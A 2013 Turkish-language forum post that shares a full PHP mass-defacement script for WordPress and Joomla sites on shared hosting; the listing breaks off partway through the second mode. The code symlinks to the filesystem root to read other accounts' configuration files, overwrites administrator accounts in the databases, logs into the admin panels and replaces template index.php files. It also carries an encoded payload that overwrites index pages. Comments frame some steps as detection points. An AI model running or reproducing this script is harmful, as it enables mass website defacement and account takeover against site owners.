
Wordpress & Joomla Mass Deface

04-07-2013 00:20
#1

WordPress ve Joomla siteleri için mass defacer dokümanını gördüm; sizinle paylaşmak istedim.

kodlar burda mevcuttur tıklayıp kodları alabilirsiniz http://www.gawfco.com/c.txt


Kod:
<?php
// Turns PHP error reporting off for the whole script, so failed calls and
// undefined-index conditions further down produce no warnings.
error_reporting(0);
/**
 * Returns the text found between two marker strings.
 *
 * Splits $text on $marqueurDebutLien, takes piece number $i (default 1, i.e. the
 * text following the first occurrence of the start marker), cuts that piece at
 * the first $marqueurFinLien and trims surrounding whitespace.
 *
 * In this listing it is used to pull database settings out of CMS configuration
 * text and to pull hidden form-field values out of admin HTML pages.
 *
 * @param string $text              Text to search.
 * @param string $marqueurDebutLien Start marker.
 * @param string $marqueurFinLien   End marker.
 * @param int    $i                 Index of the piece to use after splitting on the start marker.
 * @return string Trimmed text between the two markers.
 */
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
}

/**
 * Builds an 8-character name from lowercase letters and digits.
 *
 * The generator is seeded from the current microtime and uses rand(), so the
 * result is time-derived rather than cryptographically random.
 *
 * In this listing the value is used as a cookie-jar file name by
 * index_changer_joomla(), which deletes the file when it finishes.
 * Forensic note: a short-lived, extension-less 8-character file appearing in a
 * web directory is therefore an artefact of this script.
 *
 * @return string Eight characters drawn from $chars.
 */
function randomt() {
    $chars = "abcdefghijkmnopqrstuvwxyz023456789";
    srand((double)microtime()*1000000);
    $i = 0;
    $pass = '';
    // Loop runs for $i = 0..7, appending one character per pass.
    while ($i <= 7) {
        $num = rand() % 33;
        $tmp = substr($chars, $num, 1);
        $pass = $pass . $tmp;
        $i++;
    }
    return $pass;
}

/**
 * WordPress branch of the defacer: given the text of a wp-config.php, it takes
 * over the account with ID 1 and overwrites the active theme's index.php.
 *
 * Observable behaviour, in order (each step is a detection point):
 *  1. Extracts DB_USER, DB_PASSWORD, DB_NAME, DB_HOST and $table_prefix from $conf.
 *  2. Connects with the legacy mysql_* API and rewrites row ID 1 of
 *     <prefix>users: user_login becomes 'admin' and user_pass a fixed
 *     32-hex-character value (the literal below is a usable indicator).
 *  3. Reads the 'home', 'template' and 'current_theme' rows of <prefix>options.
 *  4. POSTs to <home>/wp-login.php with a fixed "MSIE 7.0b ... Alexa Toolbar"
 *     User-Agent, keeping cookies in ./cookie.txt.
 *  5. Requests wp-admin/theme-editor.php, extracts the _wpnonce and file fields
 *     and POSTs replacement content for index.php.
 *  6. Deletes cookie.txt.
 *
 * Defensive notes:
 *  - Step 1 needs the configuration file to be readable from another account;
 *    restrictive file modes and per-account PHP execution remove that input.
 *  - define('DISALLOW_FILE_EDIT', true) in wp-config.php disables the built-in
 *    theme editor that step 5 depends on.
 *  - Unexpected changes to user ID 1, logins carrying the User-Agent above and
 *    POSTs to theme-editor.php from the server's own address are worth alerting on.
 *
 * @param string $conf    Contents of a wp-config.php file.
 * @param string $content Base64-encoded replacement body; decoded before it is posted.
 * @return array Keys 'cond' (set to 1 when the editor reports a successful update)
 *               and 'output' (HTML progress log).
 */
function index_changer_wp($conf, $content) {
    $output = '';
    // '$' is held in a variable so the "$table_prefix" marker can be assembled
    // by concatenation.
    $dol = '$';
    $go = 0;
    // Credentials and table prefix are scraped from the configuration text.
    $username = entre2v2($conf,"define('DB_USER', '","');");
    $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
    $dbname = entre2v2($conf,"define('DB_NAME', '","');");
    $prefix = entre2v2($conf,$dol."table_prefix  = '","'");
    $host = entre2v2($conf,"define('DB_HOST', '","');");

    $link=mysql_connect($host,$username,$password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        $dol = '$';
        // Account takeover: login name and password hash of user ID 1 are overwritten.
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
    } else {
        $output.= "[-] DB Error<br />";
    }
    if($req1) {

        // Site URL and active theme are read from the options table.
        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
        $data = mysql_fetch_array($req);
        $site_url=$data["option_value"]; 

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");
        $data = mysql_fetch_array($req);
        $template = $data["option_value"];

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");
        $data = mysql_fetch_array($req);
        $current_theme = $data["option_value"];

        // Fixed User-Agent string sent with every request of this branch.
        $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
        $url2=$site_url."/wp-login.php";

        // Login request; the session cookie is stored in cookie.txt in the
        // current working directory.
        // NOTE(review): the CURLOPT_FOLLOW... option name is masked in the
        // posted listing; it is kept exactly as published.
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url2);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
        curl_setopt($ch, CURLOPT_FOLLOW********, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
        $buffer = curl_exec($ch);

        // A logout link in the response is treated as proof of a logged-in session.
        $pos = strpos($buffer,"action=logout");
        if($pos === false) {
$output.= "[-] Login Error<br />";
        } else {
$output.= "[+] Login Successful<br />";
$go = 1;
        }
        if($go) {
$cond = 0;
// First attempt: theme editor addressed with a /themes/<template>/index.php path.
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$buffer0 = curl_exec($ch);

// Anti-CSRF nonce and file field are scraped from the editor form.
$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
// The replacement body is written through the editor's own save action.
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$buffer = curl_exec($ch);
curl_close($ch);

// The admin "updated" notice is used as the success signal.
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Updated Successfuly<br />";
// The modified file is requested once over HTTP and its response is
// appended to the log.
$hk = explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}
} else {
// Second attempt: editor addressed with a bare file name and the template slug.
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$buffer0 = curl_exec($ch);

$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
    $output.= "[-] Updating Index.php Error<br />";
} else {
    $output.= "[+] Index.php Template Updated Successfuly<br />";
    $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
    $cond = 1;
}
} else {
$output.= "[-] index.php can not load in Theme Editor<br />";
}
}
        }
    } else {
        $output.= "[-] DB Error<br />";
    }
    // Clean-up: the cookie jar is removed, so it will normally not be found on
    // disk after a run.
    global $base_path;
    unlink($base_path.'cookie.txt');
    return array('cond'=>$cond, 'output'=>$output);
}

/**
 * Joomla branch of the defacer: given the text of a configuration.php, it
 * rewrites the users table and overwrites the default site template's index.php
 * through the administrator back end.
 *
 * Observable behaviour, in order (each step is a detection point):
 *  1. Extracts $user, $password, $db, $dbprefix and $host from $conf.
 *  2. Runs an UPDATE on <prefix>users with no WHERE clause: every row gets
 *     username 'admin', the same fixed 32-hex password value, usertype
 *     'Super Administrator' and block = 0.
 *  3. Checks whether a <prefix>extensions table exists and picks one of two
 *     request sequences accordingly (presumably newer vs. older Joomla schema -
 *     TODO confirm).
 *  4. Logs in at http://<domain>/administrator/index.php (option=com_login),
 *     treating "com_config" in the response as success.
 *  5. Opens the template source editor, scrapes the hidden token field and
 *     posts replacement content for index.php.
 *  6. Deletes its cookie-jar file, whose name comes from randomt().
 *
 * Defensive notes:
 *  - Because step 2 touches every account, recovery means restoring the users
 *    table from a known-good backup, not resetting a single password.
 *  - Step 1 needs configuration.php to be readable from another account;
 *    restrictive file modes and per-account PHP execution remove that input.
 *  - Restricting /administrator (source-address allow-list or an additional
 *    authentication layer) and monitoring template files for changes interrupt
 *    steps 4 and 5.
 *
 * @param string $conf    Contents of a Joomla configuration.php file.
 * @param string $content Replacement body, posted as given.
 * @param string $domain  Host name used to build the administrator URL.
 * @return array Keys 'cond' (0, or 1 when the save is reported successful) and
 *               'output' (HTML progress log).
 */
function index_changer_joomla($conf, $content, $domain) {
    $doler = '$';
    // Credentials and table prefix are scraped from the configuration text.
    $username = entre2v2($conf, $doler."user = '", "';");
    $password = entre2v2($conf, $doler."password = '", "';");
    $dbname = entre2v2($conf, $doler."db = '", "';");
    $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
    $host = entre2v2($conf, $doler."host = '","';");
    // Random cookie-jar file name for this run.
    $co=randomt();
    $site_url = "http://".$domain."/administrator";
    $output = '';
    $cond = 0; 
    $link=mysql_connect($host, $username, $password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        // No WHERE clause: all rows of the users table are overwritten.
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
        // Presence of the extensions table selects the branch below.
        $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
    } else {
        $output.= "[-] DB Error<br />";
    }
    
    if($req1){
        if ($req) {
// Branch used when <prefix>extensions exists: the default front-end template
// is looked up in template_styles and resolved to an extension_id.
$req = mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];

$req = mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];

// The login form is fetched first so its hidden 'return' and token fields can
// be replayed.
// NOTE(review): the CURLOPT_FOLLOW... option name is masked in the posted
// listing; it is kept exactly as published.
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

if($return && $hidden) {
// Administrator login request.
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_REFERER, $url2);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
// "com_config" appearing in the response is treated as a logged-in back end.
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if($pos){
// Template source editor is opened to obtain the form token.
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
$output.= "[+] index.php file found in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if($hidden2) {
// Replacement content is saved through the template editor (task=source.save).
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
curl_close($ch);

// The back-end message block is used as the success signal.
$pos = strpos($buffer,'<dd class="message message">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
   
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
        } 
        else {
// Branch used when <prefix>extensions does not exist: the template name is
// read from templates_menu and used directly as the editor id.
$req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
// Same fixed User-Agent string as the WordPress branch.
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

if($hidden) {
// Administrator login request.
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}

if($pos) {
// Template source editor is opened to obtain the form token.
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if($hidden2) {
$output.= "[+] index.php file founded in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}

if($hidden2) {
// Replacement content is saved through the template editor (task=save_source).
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<dd class="message message fade">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
        }
    } else {
        $output.= "[-] DB Error<br />";
    }
    // Clean-up: the randomly named cookie jar is removed.
    global $base_path;
    unlink($base_path.$co);
    return array('cond'=>$cond, 'output'=>$output); 
}

/**
 * Mode 1: lists hosted domains from /etc/named.conf and reaches each account's
 * CMS configuration file through a symbolic link to the filesystem root.
 *
 * Artefacts left next to the script (indicators to search for):
 *  - a directory `sym/` created with mode 0777,
 *  - `sym/.htaccess` that sets `Options all`, maps .php and .html to
 *    text/plain and contains `Satisfy Any`,
 *  - `sym/root`, a symbolic link to `/`,
 *  - `defaced.html`, an append-only list of affected URLs.
 *
 * Configuration files are then requested over HTTP as
 * <script dir>/sym/root/home/<account>/public_html/..., which relies on the web
 * server following the link and returning PHP source as text.
 * The /etc/valiases and /home/<account>/public_html paths suggest a shared
 * hosting control-panel layout - TODO confirm for the affected host.
 *
 * Hardening that removes the preconditions:
 *  - `AllowOverride` set so that account-level .htaccess files cannot change
 *    `Options` or content handlers,
 *  - `SymLinksIfOwnerMatch` instead of `FollowSymLinks` for user directories,
 *  - `symlink` listed in PHP's `disable_functions` on shared hosts,
 *  - configuration files not readable by other accounts, with PHP executed
 *    per account rather than as one shared web-server user.
 *
 * @param string $def_url URL whose body is fetched and url-encoded as replacement
 *                        content; passed to the Joomla branch. The WordPress
 *                        branch is given the embedded base64 value $dd instead.
 * @param mixed  $hacker  Not used in the body.
 * @return void Progress is echoed as an HTML table.
 */
function exec_mode_1($def_url, $hacker) {

    // Staging directory, permissive .htaccess and the link to "/".
    @mkdir('sym',0777);
    $wr  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $fp = @fopen ('sym/.htaccess','w');
    fwrite($fp, $wr);
    @symlink('/','sym/root');
    // Domain enumeration: zone names are taken from the DNS server configuration.
    $dominios = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
    $out[1] = array_unique($out[1]);
    $numero_dominios = count($out[1]);
    echo "Total domains: $numero_dominios <br><br />";
    // Replacement page body is fetched from the caller-supplied URL.
    $def = file_get_contents($def_url);
    $def = urlencode($def);
    // Embedded base64 value handed to index_changer_wp(), which decodes it
    // before posting. NOTE(review): decode only in an isolated analysis
    // environment; the content is not described here.
    $dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5uZXQvZGV​mYWNlZC8yMDEzLzAxLzEzL2JhbHRzdHVkaW8ubHQvaW5kZXguaHRtbCcpOw0KJHAgPSBleHBsb2RlKCd​wdWJsaWNfaHRtbCcsZGlybmFtZShfX0ZJTEVfXykpOw0KJHAgPSAkcFswXS4ncHVibGljX2h0bWwnOw0​KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5​odG1sJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHA​uJy9pbmRleC5waHAnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEB​mb3BlbigkcC4nL2luZGV4Lmh0bScsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICB​lY2hvICdEb25lJzsNCn0NCmNsb3NlZGlyKCRoYW5kbGUpOw0KdW5saW5rKF9fRklMRV9fKTsNCj8+';
    // Base URL that resolves, via sym/root, to /home/ on the server.
    $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
    $output = fopen('defaced.html', 'a+');
    // Per-session counters are kept only when a start offset 'st' is supplied.
    $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
    $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
    for($i = $st; $i <= $numero_dominios; $i++)
    {
        $domain = $out[1][$i];
        // The owner of /etc/valiases/<domain> is used as the hosting account name.
        $dono_arquivo = @fileowner("/etc/valiases/".$domain);
        $infos = @posix_getpwuid($dono_arquivo);
        
        if($infos['name']!='root') {
// Three fixed locations are probed per account.
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");

$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
// 'dbprefix' in the file marks it as a Joomla configuration.
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}

// 'DB_NAME' in the file marks it as a WordPress configuration.
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
// Same check for a WordPress install under /blog.
if($config03 && preg_match('/DB_NAME/i',$config03)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config03, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {    
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($_SESSION['count1']+$_SESSION['count2'] > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
/**
 * Mode 2: same goal as mode 1, but configuration files are collected by a CGI
 * script that the function drops and then invokes over HTTP.
 *
 * Artefacts created next to the script (indicators to search for):
 *  - a directory `plsym/` created with mode 0777,
 *  - `plsym/plsym.cc`, written from an embedded base64 value, set to 0755 and
 *    deleted again after one request,
 *  - `plsym/.htaccess` enabling `ExecCGI`, `Indexes` and `FollowSymLinks` and
 *    mapping the `.cc` extension to `cgi-script`,
 *  - entries in `plsym/` whose names contain `##joomla.txt` or
 *    `##wordpress.txt` (the loop below splits on '##' and matches those names),
 *  - `defaced.html`, an append-only list of affected URLs.
 *
 * NOTE(review): the first bytes of the base64 value decode to a Perl shebang;
 * the rest presumably creates the per-account entries read below - confirm by
 * decoding in an isolated analysis environment.
 *
 * Hardening that removes the preconditions:
 *  - `AllowOverride` set so that account-level .htaccess files cannot enable
 *    `ExecCGI`, add handlers or turn on directory indexes,
 *  - alerting on .htaccess files that map unusual extensions to `cgi-script`,
 *  - configuration files not readable by other accounts.
 *
 * @param string $def_url URL whose body is fetched and url-encoded as replacement content.
 * @return void Progress is echoed as an HTML table.
 */
function exec_mode_2($def_url) {
    
    // Domain enumeration: zone names are taken from the DNS server configuration.
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    print("Total domains: $num<br><br />");
    
    $def = file_get_contents($def_url);
    $def = urlencode($def);
       
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    // Account name -> domain, derived from the owner of /etc/valiases/<domain>.
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    // Embedded base64 value written to disk as the CGI script below.
